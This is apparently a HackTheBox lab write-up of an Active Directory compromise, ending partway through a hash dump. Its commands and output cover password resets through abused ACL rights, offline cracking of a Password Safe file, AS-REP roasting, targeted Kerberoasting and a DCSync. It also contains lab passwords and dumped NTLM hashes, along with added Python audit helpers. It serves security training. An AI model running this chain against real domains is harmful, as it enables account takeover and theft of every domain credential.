Windows Life from Zero - Administrator


Target IP: 10.129.201.160 (the box was laggy, so the IP changes several times over the course of this writeup; bear with it)

Initial credentials: Username: Olivia Password: ichliebedich

Difficulty: Medium

Topics covered:

Port and service scanning (Nmap/NetExec): port discovery and SMB/WinRM service enumeration.

Domain reconnaissance (BloodHound): automated collection of domain users, computers, groups and ACL relationships.

ACL abuse

  • GenericAll: full control, used here to take over an account.
  • ForceChangePassword: reset a password without knowing the current one.
  • GenericWrite: modify a user's attributes.

Sensitive file analysis and cracking: retrieving a file over FTP and cracking a Password Safe (psafe3) database.

Kerberos attacks

  • AS-REP Roasting: disable pre-authentication to obtain a crackable hash.
  • Targeted Kerberoasting (mentioned): set an SPN to obtain a crackable hash.

DCSync: abuse directory replication rights to dump every hash in the domain.

Pass-the-Hash: log in to the server with the NTLM hash instead of a password.


Port scanning and basic service enumeration

Full nmap port scan

┌─[sg-dedivip-1]─[10.10.14.70]─[skyarrow@htb-yjutg7usv8]─[~]
└──╼ [★]$ nmap -p- 10.129.201.160
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-18 00:21 CST
Nmap scan report for 10.129.201.160
Host is up (0.0038s latency).
Not shown: 65509 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49668/tcp open unknown
51809/tcp open unknown
51814/tcp open unknown
51825/tcp open unknown
51830/tcp open unknown
51841/tcp open unknown
51875/tcp open unknown

Detailed nmap scan

┌─[sg-dedivip-1]─[10.10.14.70]─[skyarrow@htb-yjutg7usv8]─[~]
└──╼ [★]$ nmap -p21,53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,47001,49664,49665,49666,49667,49668,51809,51814,51825,51830,51841,51875 -sV -sC -A 10.129.201.160
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-18 00:25 CST
Stats: 0:00:22 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 61.54% done; ETC: 00:25 (0:00:14 remaining)
Stats: 0:00:49 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 61.54% done; ETC: 00:26 (0:00:31 remaining)
Stats: 0:00:55 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 96.15% done; ETC: 00:26 (0:00:02 remaining)
Nmap scan report for 10.129.201.160
Host is up (0.0023s latency).

PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-01-18 13:25:11Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
51809/tcp open msrpc Microsoft Windows RPC
51814/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
51825/tcp open msrpc Microsoft Windows RPC
51830/tcp open msrpc Microsoft Windows RPC
51841/tcp open msrpc Microsoft Windows RPC
51875/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 10|2022|2016|2019|2012|Vista|11|7|8.1|2008 (93%)
OS CPE: cpe:/o:microsoft:windows_10:1703 cpe:/o:microsoft:windows_server_2022 cpe:/o:microsoft:windows_server_2016 cpe:/o:microsoft:windows_server_2012 cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_7:::ultimate cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_server_2008::sp2
Aggressive OS guesses: Microsoft Windows 10 1703 (93%), Windows Server 2022 (93%), Microsoft Windows Server 2016 build 10586 - 14393 (93%), Microsoft Windows 10 1511 (93%), Microsoft Windows Server 2019 (93%), Microsoft Windows Server 2016 (93%), Microsoft Windows Server 2012 (92%), Microsoft Windows Vista SP1 (92%), Microsoft Windows 11 21H2 (91%), Microsoft Windows 10 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2026-01-18T13:26:11
|_ start_date: N/A
|_clock-skew: 7h00m00s

TRACEROUTE (using port 135/tcp)
HOP RTT ADDRESS
1 3.11 ms 10.10.14.1
2 3.64 ms 10.129.201.160

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 72.72 seconds

The scan exposes the domain administrator.htb (the trailing "0." in administrator.htb0. is a known nmap display quirk, not part of the name) and the host name DC; add both to /etc/hosts. Also note the script-scan result clock-skew: 7h00m00s. Kerberos tolerates only five minutes of skew by default, so every Kerberos-based step later on needs the attacker's clock synced with the DC first.

echo "10.129.201.160 administrator.htb dc.administrator.htb" >> /etc/hosts

Probing the FTP service.

┌─[✗][root@htb-yjutg7usv8][/home/skyarrow]
└──╼ #ftp 10.129.201.160
Connected to 10.129.201.160.
220 Microsoft FTP Service
Name (10.129.201.160:root): Olivia
331 Password required
Password:
530 User cannot log in, home directory inaccessible.
ftp: Login failed
ftp>
┌─[root@htb-yjutg7usv8][/home/skyarrow]
└──╼ #nxc ftp 10.129.201.160 -u 'Olivia' -p 'ichliebedich'
FTP 10.129.201.160 21 10.129.201.160 [*] Banner: Microsoft FTP Service
FTP 10.129.201.160 21 10.129.201.160 [-] Olivia:ichliebedich (Response:530 User cannot log in, home directory inaccessible.)

Olivia authenticates, but the server answers "home directory inaccessible": this is the IIS FTP message for an account that has no FTP directory mapped (with user isolation each account needs its own virtual directory), so the current user simply has no FTP access. The message is worth remembering because it differs from the response for a wrong password.

Checking SMB shares.

┌─[root@htb-yjutg7usv8]─[/home/skyarrow]
└──╼ #nxc smb 10.129.201.160 -u 'Olivia' -p 'ichliebedich' --shares
SMB 10.129.201.160 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB 10.129.201.160 445 DC [+] administrator.htb\Olivia:ichliebedich
SMB 10.129.201.160 445 DC [*] Enumerated shares
SMB 10.129.201.160 445 DC Share Permissions Remark
SMB 10.129.201.160 445 DC ----- ----------- ------
SMB 10.129.201.160 445 DC ADMIN$ Remote Admin
SMB 10.129.201.160 445 DC C$ Default share
SMB 10.129.201.160 445 DC IPC$ READ Remote IPC
SMB 10.129.201.160 445 DC NETLOGON READ Logon server share
SMB 10.129.201.160 445 DC SYSVOL READ Logon server share

Only the default shares, no custom share names, and nothing of interest after a look around SYSVOL and NETLOGON.

Enumerating domain users.

┌─[root@htb-yjutg7usv8]─[/home/skyarrow]
└──╼ #nxc smb 10.129.201.160 -u 'Olivia' -p 'ichliebedich' --users
SMB 10.129.201.160 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB 10.129.201.160 445 DC [+] administrator.htb\Olivia:ichliebedich
SMB 10.129.201.160 445 DC -Username- -Last PW Set- -BadPW- -Description-
SMB 10.129.201.160 445 DC Administrator 2024-10-22 18:59:36 0 Built-in account for administering the computer/domain
SMB 10.129.201.160 445 DC Guest <never> 0 Built-in account for guest access to the computer/domain
SMB 10.129.201.160 445 DC krbtgt 2024-10-04 19:53:28 0 Key Distribution Center Service Account
SMB 10.129.201.160 445 DC olivia 2024-10-06 01:22:48 0
SMB 10.129.201.160 445 DC michael 2024-10-06 01:33:37 0
SMB 10.129.201.160 445 DC benjamin 2024-10-06 01:34:56 0
SMB 10.129.201.160 445 DC emily 2024-10-30 23:40:02 0
SMB 10.129.201.160 445 DC ethan 2024-10-12 20:52:14 0
SMB 10.129.201.160 445 DC alexander 2024-10-31 00:18:04 0
SMB 10.129.201.160 445 DC emma 2024-10-31 00:18:35 0

Checking the WinRM service (Pwn3d! below means Olivia is allowed to open a remote PowerShell session).

┌─[root@htb-yjutg7usv8][/home/skyarrow]
└──╼ #nxc winrm 10.129.201.160 -u 'Olivia' -p 'ichliebedich'
WINRM 10.129.201.160 5985 DC [*] Windows Server 2022 Build 20348 (name:DC) (domain:administrator.htb)
WINRM 10.129.201.160 5985 DC [+] administrator.htb\Olivia:ichliebedich (Pwn3d!)

Automated domain reconnaissance (BloodHound)

So we log in with evil-winrm and, from the attacker box, collect the domain data with bloodhound-python (the IP changes from here on because the lab instance was reset). Note in the collector output that the Kerberos TGT request fails with KRB_AP_ERR_SKEW, the 7-hour clock skew seen in the nmap scan; bloodhound-python falls back to NTLM, so collection still completes, but tools that can only use Kerberos will need the clock synced.

┌─[root@htb-yjutg7usv8]─[/home/skyarrow/Desktop]
└──╼ #evil-winrm -i 10.129.172.64 -u 'Olivia' -p 'ichliebedich'

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\olivia\Documents>
┌─[root@htb-yjutg7usv8]─[/home/skyarrow/Desktop]
└──╼ #bloodhound-python -u Olivia -p 'ichliebedich' -d administrator.htb -ns 10.129.172.64 -c All --zip
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: administrator.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
INFO: Connecting to LDAP server: dc.administrator.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc.administrator.htb
INFO: Found 11 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc.administrator.htb
INFO: Done in 00M 01S
INFO: Compressing output into 20260118010248_bloodhound.zip

ACL abuse chain: from Olivia to Benjamin

BloodHound analysis shows that Olivia holds GenericAll over the user michael, so we can simply reset his password.

Background: GenericAll is full control. In Active Directory, if principal A holds it over object B, A can do anything to B: reset the password, add it to groups, write any of its attributes (including adding an SPN) and even change its logon script. It is one of the most powerful rights to abuse. A password reset is the fastest route but also the noisiest and most disruptive one (the real user is locked out and the reset is logged as event 4724), so on a real engagement prefer a non-destructive option such as targeted Kerberoasting, which this right also permits.

*Evil-WinRM* PS C:\Users\olivia\Documents> net user michael password123! /domain
The command completed successfully.

Next, michael turns out to hold ForceChangePassword over benjamin, so the same trick applies, this time from Linux with Samba's net rpc, which performs the SAMR password reset over port 445.

This is the User-Force-Change-Password extended right. It lets the holder reset the target's password without knowing the current one. Unlike a normal password change, which requires the old password, it exists so administrators can reset forgotten passwords, but in an attack it hijacks the account outright.

┌─[root@htb-yjutg7usv8]─[/home/skyarrow/Desktop]
└──╼ #net rpc password "benjamin" "newP@ssword2022" -U "administrator.htb"/"michael"%"password123!" -S "10.129.172.64"
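To make the rights in this chain concrete, here is an added Python example (not code from the original post) that maps raw Active Directory ACEs, i.e. an access mask plus an optional object-type GUID, onto the abuse primitives BloodHound labels its edges with, and then checks whether a principal and its groups together hold the pair of replication rights that DCSync needs. The ACLs below are constructed to mirror this writeup's path; only the mask bits and the extended-right GUIDs are the documented Windows values.

```python
"""Map Active Directory ACEs onto the abuse primitives BloodHound labels them with.

Added example for this writeup (not the author's code): the ACLs are constructed
to mirror the chain above; the mask bits and GUIDs are the documented Windows values.
"""
from dataclasses import dataclass
from typing import Iterable, Optional

# ACCESS_MASK bits (ADS_RIGHTS_ENUM plus the generic rights).
DS_WRITE_PROP     = 0x00000020  # write a property (which one depends on ObjectType)
DS_CONTROL_ACCESS = 0x00000100  # extended right (which one depends on ObjectType)
WRITE_DAC         = 0x00040000
WRITE_OWNER       = 0x00080000
GENERIC_ALL       = 0x10000000
GENERIC_WRITE     = 0x40000000

# rightsGuid values of the extended rights this writeup abuses.
FORCE_CHANGE_PASSWORD = "00299570-246d-11d0-a768-00aa006e0529"  # User-Force-Change-Password
GET_CHANGES           = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"  # DS-Replication-Get-Changes
GET_CHANGES_ALL       = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"  # DS-Replication-Get-Changes-All


@dataclass(frozen=True)
class Ace:
    trustee: str                       # who is granted the right (SID or name)
    mask: int                          # ACCESS_MASK of an allow ACE
    object_type: Optional[str] = None  # None: applies to every property / extended right


def primitives(ace: Ace) -> set[str]:
    """Name the abuse primitives a single allow ACE grants."""
    m = ace.mask
    if m & GENERIC_ALL:
        return {"GenericAll"}  # full control; everything below is implied
    out: set[str] = set()
    if m & GENERIC_WRITE or (m & DS_WRITE_PROP and ace.object_type is None):
        out.add("GenericWrite")  # any attribute: servicePrincipalName, scriptPath, ...
    if m & WRITE_DAC:
        out.add("WriteDacl")
    if m & WRITE_OWNER:
        out.add("WriteOwner")
    if m & DS_CONTROL_ACCESS:
        guid = ace.object_type.lower() if ace.object_type else None
        if guid is None:
            out.add("AllExtendedRights")  # includes all three rights below
        elif guid == FORCE_CHANGE_PASSWORD:
            out.add("ForceChangePassword")
        elif guid == GET_CHANGES:
            out.add("GetChanges")
        elif guid == GET_CHANGES_ALL:
            out.add("GetChangesAll")
    return out


def rights_for(aces: Iterable[Ace], principal: str, groups: Iterable[str] = ()) -> set[str]:
    """Union of primitives granted to the principal directly or through its groups."""
    holders = {principal, *groups}
    found: set[str] = set()
    for ace in aces:
        if ace.trustee in holders:
            found |= primitives(ace)
    return found


def can_dcsync(domain_aces: Iterable[Ace], principal: str, groups: Iterable[str] = ()) -> bool:
    """DCSync needs both replication rights on the domain object (or a right that implies them)."""
    rights = rights_for(domain_aces, principal, groups)
    if rights & {"GenericAll", "AllExtendedRights"}:
        return True
    return {"GetChanges", "GetChangesAll"} <= rights


# Constructed ACLs that mirror this writeup's path (not data collected from the lab).
MICHAEL_ACL  = [Ace("olivia", GENERIC_ALL)]
BENJAMIN_ACL = [Ace("michael", DS_CONTROL_ACCESS, FORCE_CHANGE_PASSWORD)]
ETHAN_ACL    = [Ace("emily", GENERIC_WRITE)]
DOMAIN_ACL   = [
    Ace("ethan", DS_CONTROL_ACCESS, GET_CHANGES),
    Ace("ethan", DS_CONTROL_ACCESS, GET_CHANGES_ALL),
    Ace("olivia", DS_CONTROL_ACCESS, GET_CHANGES),  # only half of the pair: no DCSync
    Ace("Domain Admins", GENERIC_ALL),             # group grants apply to every member
]

if __name__ == "__main__":
    for holder, acl, target in [("olivia", MICHAEL_ACL, "michael"),
                                ("michael", BENJAMIN_ACL, "benjamin"),
                                ("emily", ETHAN_ACL, "ethan")]:
        print(f"{holder} -> {target}: {sorted(rights_for(acl, holder))}")
    print("ethan can DCSync:", can_dcsync(DOMAIN_ACL, "ethan"))
    print("olivia can DCSync:", can_dcsync(DOMAIN_ACL, "olivia"))
```

The point of the last two checks is the one that matters later in this box: a single DS-Replication-Get-Changes ACE is not enough, BloodHound only draws a DCSync edge when both replication rights (or a right that implies them) land on the domain object, directly or via group membership.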

Sensitive file exposure and credential cracking

Checking benjamin's group memberships and rights shows that he has read access to the FTP share.

Log in to FTP as benjamin and take a look.

┌─[root@htb-yjutg7usv8]─[/home/skyarrow/Desktop]
└──╼ #ftp 10.129.172.64
Connected to 10.129.172.64.
220 Microsoft FTP Service
Name (10.129.172.64:root): benjamin
331 Password required
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
229 Entering Extended Passive Mode (|||62403|)
125 Data connection already open; Transfer starting.
10-05-24 08:13AM 952 Backup.psafe3
226 Transfer complete.
ftp> get "Backup.psafe3"
local: Backup.psafe3 remote: Backup.psafe3
229 Entering Extended Passive Mode (|||62404|)
125 Data connection already open; Transfer starting.
100% |*********************************| 952 311.03 KiB/s 00:00 ETA
226 Transfer complete.
WARNING! 3 bare linefeeds received in ASCII mode.
File may not have transferred correctly.
952 bytes received in 00:00 (298.26 KiB/s)
ftp>

We get a Password Safe v3 database protected by a master password; let hashcat auto-detect the format and crack it. (The "bare linefeeds received in ASCII mode" warning above is a reminder to switch the FTP client to binary mode before fetching a binary file; this 952-byte file came through intact, but a larger one might not.)

┌─[✗]─[root@htb-yjutg7usv8]─[/home/skyarrow/Desktop]
└──╼ #hashcat Backup.psafe3
hashcat (v6.2.6) starting in autodetect mode

OpenCL API (OpenCL 3.0 PoCL 3.1+debian Linux, None+Asserts, RELOC, SPIR, LLVM 15.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: pthread-skylake-avx512-AMD EPYC 9575F 64-Core Processor, skipped

OpenCL API (OpenCL 2.1 LINUX) - Platform #2 [Intel(R) Corporation]
==================================================================
* Device #2: AMD EPYC 9575F 64-Core Processor, 3922/7908 MB (988 MB allocatable), 4MCU

The following 37 hash-modes match the structure of your input hash:

# | Name |
...
6233 | TrueCrypt Whirlpool + XTS 1536 bit (legacy) | Full-Disk Encryption (FDE)
5200 | Password Safe v3 | Password Manager

┌─[✗]─[root@htb-yjutg7usv8]─[/home/skyarrow/Desktop]
└──╼ #hashcat -m 5200 Backup.psafe3 rockyou2.txt
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 3.1+debian Linux, None+Asserts, RELOC, SPIR, LLVM 15.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: pthread-skylake-avx512-AMD EPYC 9575F 64-Core Processor, skipped

OpenCL API (OpenCL 2.1 LINUX) - Platform #2 [Intel(R) Corporation]
==================================================================
* Device #2: AMD EPYC 9575F 64-Core Processor, 3922/7908 MB (988 MB allocatable), 4MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Single-Hash
* Single-Salt
* Slow-Hash-SIMD-LOOP

ATTENTION! Potfile storage is disabled for this hash mode.
Passwords cracked during this session will NOT be stored to the potfile.
Consider using -o to save cracked passwords.

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

Host memory required for this attack: 1 MB

Dictionary cache built:
* Filename..: rockyou2.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 1 sec

Backup.psafe3:tekieromucho

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5200 (Password Safe v3)
Hash.Target......: Backup.psafe3
Time.Started.....: Sun Jan 18 01:17:53 2026 (0 secs)
Time.Estimated...: Sun Jan 18 01:17:53 2026 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (rockyou2.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#2.........: 66897 H/s (4.97ms) @ Accel:256 Loops:1024 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 5120/14344385 (0.04%)
Rejected.........: 0/5120 (0.00%)
Restore.Point....: 4096/14344385 (0.03%)
Restore.Sub.#2...: Salt:0 Amplifier:0-1 Iteration:2048-2049
Candidate.Engine.: Device Generator
Candidates.#2....: newzealand -> babygrl

Started: Sun Jan 18 01:17:45 2026
Stopped: Sun Jan 18 01:17:54 2026

Cracked: the master password is tekieromucho. Mode 5200 is slow per guess (2048 rounds of SHA-256 by default, which is the Iteration range shown in the status), but the password sits early in the wordlist.

Opening the database with that password yields three sets of credentials.

alexander:UrkIbagoxMyUGw0aPlj9B0AXSea4Sw
emily:UXLCI5iETUsIBoFVTj8yQFKoHjXmb
emma:WwANQWnmJnGV07WQN8bMS7FMAbjNur

Targeted Kerberoasting with GenericWrite

Testing the three credentials, user.txt turns up on emily's desktop.

BloodHound also shows that emily holds GenericWrite over the user ethan, i.e. we can write attributes of that account. That gives two different ways to obtain a crackable hash for ethan:

Option A: AS-REP Roasting (flip the pre-authentication flag). Principle: use the write access to set "Do not require Kerberos preauthentication" on the account, then request an AS-REP for it; the encrypted part of the reply is derived from ethan's password and can be cracked offline.

  1. Log in as emily and disable pre-authentication for ethan with PowerView or the native AD module: Set-ADAccountControl -Identity ethan -DoesNotRequirePreAuth $true
  2. Request the hash with impacket's GetNPUsers: … (the GetNPUsers request and the hashcat cracking follow below) …

Option B: Targeted Kerberoasting (set an SPN). Principle: use the write access to add a Service Principal Name to ethan, which makes the account a Kerberoasting target: any domain user can then request a service ticket for that SPN, and the ticket is encrypted with ethan's key.

If you would rather not touch the pre-authentication setting, or want a second route, the targetedKerberoast tool automates this (adds an SPN, requests the TGS, removes the SPN again). Note: this route runs entirely over Kerberos, so the attacker's clock must be within five minutes of the DC, which the 7-hour skew from the nmap scan does not satisfy; sync first (for example ntpdate against the DC).

┌─[✗]─[root@htb-yjutg7usv8]─[/home/skyarrow/Desktop]
└──╼ #evil-winrm -i 10.129.172.64 -u 'emily' -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb'

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\emily\Documents> Get-ADUser ethan | Set-ADAccountControl -doesnotrequirepreauth $true
This clears the pre-authentication requirement on ethan's AD account (it sets the DONT_REQ_PREAUTH bit, 0x400000, in userAccountControl).

Then use impacket's GetNPUsers to request an AS-REP for ethan; the output is a $krb5asrep$23$ hash.

hashcat -m 18200 ethan_hash.txt /usr/share/wordlists/rockyou.txt

Cracking it gives the password limpbizkit. Mind the hashcat mode: an AS-REP hash ($krb5asrep$23$) is mode 18200, while mode 13100 is for the $krb5tgs$23$ TGS-REP hash that the targetedKerberoast route below produces; feeding an AS-REP hash to 13100 is rejected as a format mismatch.

Alternatively, targetedKerberoast gets the same result (remember to sync the clock with the DC first):

┌─[root@htb-da9rehgmmn][/home/skyarrow/Desktop/targetedKerberoast]
└──╼ #python3 targetedKerberoast.py -v -d 'administrator.htb' -u emily -p UXLCI5iETUsIBoFVTj8yQFKoHjXmb
[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[VERBOSE] SPN added successfully for (ethan)
[+] Printing hash for (ethan)
$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator.htb/ethan*$6cf8994cc318d87e8b3aee9b17569fb9$…
[VERBOSE] SPN removed successfully for (ethan)
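Both routes work by changing one attribute of the target account, which is also what a defender would look for. The following is an added Python example (not from the original post) with the audit logic for the two conditions, AS-REP roastable (pre-authentication off) and Kerberoastable (an SPN on an enabled, non-computer user account), applied to a constructed directory snapshot before and after the two writes above. Only the UF_* bit values and the SPN string from the targetedKerberoast output are taken from the real world; the user records are made up.

```python
"""Audit which accounts are AS-REP roastable or Kerberoastable, and show what the two
attribute writes above (pre-auth flag, SPN) change.

Added example for this writeup, not the author's code. The user records are
constructed; the UF_* values are the documented userAccountControl bits.
"""
UF_ACCOUNTDISABLE            = 0x0002
UF_NORMAL_ACCOUNT            = 0x0200
UF_WORKSTATION_TRUST_ACCOUNT = 0x1000
UF_SERVER_TRUST_ACCOUNT      = 0x2000
UF_DONT_REQUIRE_PREAUTH      = 0x400000  # set by Set-ADAccountControl -DoesNotRequirePreAuth $true


def is_disabled(u: dict) -> bool:
    return bool(u["userAccountControl"] & UF_ACCOUNTDISABLE)


def is_computer(u: dict) -> bool:
    trust = UF_WORKSTATION_TRUST_ACCOUNT | UF_SERVER_TRUST_ACCOUNT
    return u["sAMAccountName"].endswith("$") or bool(u["userAccountControl"] & trust)


def asrep_roastable(u: dict) -> bool:
    """Enabled account for which the KDC answers an AS-REQ without proof of the password."""
    return not is_disabled(u) and bool(u["userAccountControl"] & UF_DONT_REQUIRE_PREAUTH)


def kerberoastable(u: dict) -> bool:
    """Enabled user (not a computer, not krbtgt) with an SPN: any domain user can get a TGS for it."""
    return (bool(u.get("servicePrincipalName")) and not is_disabled(u)
            and not is_computer(u) and u["sAMAccountName"].lower() != "krbtgt")


def audit(users: list[dict]) -> dict[str, list[str]]:
    return {
        "asrep": sorted(u["sAMAccountName"] for u in users if asrep_roastable(u)),
        "kerberoast": sorted(u["sAMAccountName"] for u in users if kerberoastable(u)),
    }


# The two writes that emily's GenericWrite over ethan allows, applied to the same records.
def disable_preauth(u: dict) -> dict:
    return {**u, "userAccountControl": u["userAccountControl"] | UF_DONT_REQUIRE_PREAUTH}


def add_spn(u: dict, spn: str) -> dict:
    return {**u, "servicePrincipalName": [*u.get("servicePrincipalName", []), spn]}


def remove_spn(u: dict, spn: str) -> dict:
    return {**u, "servicePrincipalName": [s for s in u.get("servicePrincipalName", []) if s != spn]}


# Constructed directory snapshot (names follow this writeup, values are made up).
USERS = [
    {"sAMAccountName": "krbtgt", "userAccountControl": UF_NORMAL_ACCOUNT | UF_ACCOUNTDISABLE,
     "servicePrincipalName": ["kadmin/changepw"]},            # disabled by design: never roastable
    {"sAMAccountName": "DC$", "userAccountControl": UF_SERVER_TRUST_ACCOUNT,
     "servicePrincipalName": ["HOST/dc.administrator.htb"]},  # computer account: random password
    {"sAMAccountName": "emily", "userAccountControl": UF_NORMAL_ACCOUNT, "servicePrincipalName": []},
    {"sAMAccountName": "ethan", "userAccountControl": UF_NORMAL_ACCOUNT, "servicePrincipalName": []},
]

SPN = "administrator.htb/ethan"  # the SPN targetedKerberoast added and removed above


def after_attack(step: str) -> dict[str, list[str]]:
    """Re-run the audit after one of the writeup's modifications of ethan."""
    users = []
    for u in USERS:
        if u["sAMAccountName"] == "ethan":
            if step == "asrep":
                u = disable_preauth(u)
            elif step == "spn":
                u = add_spn(u, SPN)
            elif step == "spn-removed":
                u = remove_spn(add_spn(u, SPN), SPN)
        users.append(u)
    return audit(users)


if __name__ == "__main__":
    print("baseline    :", audit(USERS))
    print("pre-auth off:", after_attack("asrep"))
    print("SPN added   :", after_attack("spn"))
    print("SPN removed :", after_attack("spn-removed"))
```

The asymmetry between the two routes is visible in the last two lines: targetedKerberoast removes the SPN again, so a periodic audit sees nothing afterwards and only a change log of servicePrincipalName (or the TGS request itself) catches it, whereas the cleared pre-authentication flag stays set until someone reverts it.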

DCSync: dumping the domain hashes and final login

Checking ethan's rights shows he holds DS-Replication-Get-Changes and DS-Replication-Get-Changes-All on the domain object (BloodHound draws the pair as a single DCSync edge). Together they let the holder ask the DC to replicate password data over DRSUAPI exactly as another domain controller would, which is what impacket-secretsdump does below. ethan is not a local administrator on the DC, so the RemoteOperations step (SAM/LSA dump) fails with rpc_s_access_denied; that is expected and harmless, the DRSUAPI path still works. Pass -just-dc (or -just-dc-ntlm for the NT hashes only) to skip the failing step.

impacket-secretsdump administrator.htb/ethan:limpbizkit@10.129.201.176 -dc-ip 10.129.201.176
┌─[root@htb-da9rehgmmn]─[/home/skyarrow/Desktop]
└──╼ #impacket-secretsdump administrator.htb/ethan:limpbizkit@10.129.187.143 -dc-ip 10.129.187.143
Impacket v0.13.0.dev0+20250130.104306.0f4b866 - Copyright Fortra, LLC and its affiliated companies

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:3dc553ce4b9fd20bd016e098d2d2fd2e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1181ba47d45fa2c76385a82409cbfaf6:::
administrator.htb\olivia:1108:aad3b435b51404eeaad3b435b51404ee:fbaa3e2294376dc0f5aeb6b41ffa52b7:::
administrator.htb\michael:1109:aad3b435b51404eeaad3b435b51404ee:8864a202387fccd97844b924072e1467:::
administrator.htb\benjamin:1110:aad3b435b51404eeaad3b435b51404ee:95687598bfb05cd32eaa2831e0ae6850:::
administrator.htb\emily:1112:aad3b435b51404eeaad3b435b51404ee:eb200a2583a88ace2983ee5caa520f31:::
